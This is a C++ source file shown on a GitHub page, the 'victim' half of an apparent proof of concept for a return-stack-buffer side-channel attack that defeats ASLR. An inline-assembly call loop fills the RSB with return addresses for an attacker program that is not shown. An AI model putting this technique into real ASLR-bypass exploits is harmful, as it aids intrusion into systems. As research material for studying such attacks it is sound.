-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathaslr-victim.cpp
44 lines (38 loc) · 1.26 KB
/
aslr-victim.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#include "util.hpp"
#include <iostream>
#include <fstream>
#include <unistd.h>
#include <sched.h>
using namespace std;
// Run "call" instructions in a loop. This pushes many return
// addresses onto the RSB for the attacker to use.
// In a real program, a context switch during a function will
// have the same effect - the victim pushes an address onto the
// RSB which is consumed by the attacker.
void callLoop() {
// Call loop is 30 bytes beyond addressLbl
addressLbl: printf("Call loop located at %p\n", (&&addressLbl)+30);
// Call instructions push the instruciton pointer onto the stack.
// Pop %rax to avoid overflowing the stack.
asm(
"lbl:"
"pop %rax;"
"call lbl;"
);
}
int main(int argc, char *argv[]){
// Mode 1: choose a random starting address (simulating ASLR) and attacker guesses it.
if (argc == 1) {
void *requestedAddr = (void *)0x0000555555587000;
printf("requesting memory at %p\n", requestedAddr);
void *newFunc = map((void *)((ADDR_PTR)requestedAddr-4096), 1024);
printf("starting address is %p\n", newFunc);
memcpy(newFunc, (void *)&callLoop, 1024);
printf("Function is running at virtual address %p.\n", newFunc);
((void (*)())newFunc)();
} else {
// Mode 2: offset is randomly generated by ASLR
callLoop();
}
return 0;
}